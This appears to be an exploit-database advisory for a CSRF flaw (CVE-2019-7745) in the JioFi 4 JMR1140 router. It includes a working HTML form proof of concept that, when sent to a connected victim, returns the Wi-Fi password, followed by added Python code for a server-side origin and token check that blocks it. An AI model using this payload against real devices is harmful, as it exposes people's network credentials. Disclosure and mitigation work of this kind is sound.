Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)

ID: 100994
CVE: None
Download vulnerable application: None
# Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:
# Vendor Homepage:
# Hardware Link:
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7745


JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-bin/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field.

1. Create a view.html file and insert:

  <script>history.pushState('', '', '/')</script>
  <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
    <input type="hidden" name="Page" value="GetWiFi&#95;Setting" />
    <input type="hidden" name="Mask" value="0" />
    <input type="hidden" name="result" value="0" />
    <input type="submit" value="Submit request" />
  </form>

2. Send to victim (who is connected to the Wi-Fi network).
3. The response gives the current Wi-Fi password.
  Example response-


Note: I believe this works on all other Jio routers, viz. Jio JMR 540, JioFi M2, as all share a similar web interface. I have not confirmed this.
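
A server-side check that would reject the forged form submission above, as an added example (not code from the advisory or from the vendor's firmware). The session id, the `csrf_token` form field, the header dictionary with canonical header names, and the sample key and requests are assumptions made for illustration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Host taken from the form action in the advisory; assumed to serve the admin UI.
TRUSTED_HOSTS = {"jiofi.local.html"}
# Only GetWiFi_Setting is named in the advisory; extend for other secret-bearing pages.
SENSITIVE_PAGES = {"GetWiFi_Setting"}


def csrf_token(server_key, session_id):
    """Per-session token the device would embed in its own pages (hypothetical)."""
    return hmac.new(server_key, session_id.encode(), hashlib.sha256).hexdigest()


def source_host(headers):
    """Host of the page that issued the request; Origin wins, Referer is the fallback."""
    origin = headers.get("Origin")
    if origin is not None:
        return urlsplit(origin).hostname  # "Origin: null" yields None
    referer = headers.get("Referer")
    return urlsplit(referer).hostname if referer else None


def allow_request(headers, form, server_key, session_id):
    """Return (allowed, reason) for a POST to /cgi-bin/qcmap_web_cgi."""
    if form.get("Page") not in SENSITIVE_PAGES:
        return True, "not a sensitive page"
    if not session_id:
        return False, "no authenticated session"
    if source_host(headers) not in TRUSTED_HOSTS:
        return False, "cross-site or missing origin"
    expected = csrf_token(server_key, session_id).encode()
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed sample requests, not captured traffic.
KEY, SESSION = b"constructed-demo-key", "constructed-session-id"
POC_FORM = {"Page": "GetWiFi_Setting", "Mask": "0", "result": "0"}
FORGED = allow_request({"Origin": "http://attacker.example"}, POC_FORM, KEY, SESSION)
LEGIT = allow_request({"Origin": "http://jiofi.local.html"},
                      dict(POC_FORM, csrf_token=csrf_token(KEY, SESSION)), KEY, SESSION)

if __name__ == "__main__":
    print("forged:", FORGED)
    print("legit: ", LEGIT)
```

The origin check alone stops the cross-site form post; the session-bound token covers clients that send neither an Origin nor a Referer header from a trusted page.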